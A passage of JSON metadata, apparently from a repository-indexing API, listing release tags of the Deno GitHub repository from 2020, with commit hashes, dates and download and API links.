tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G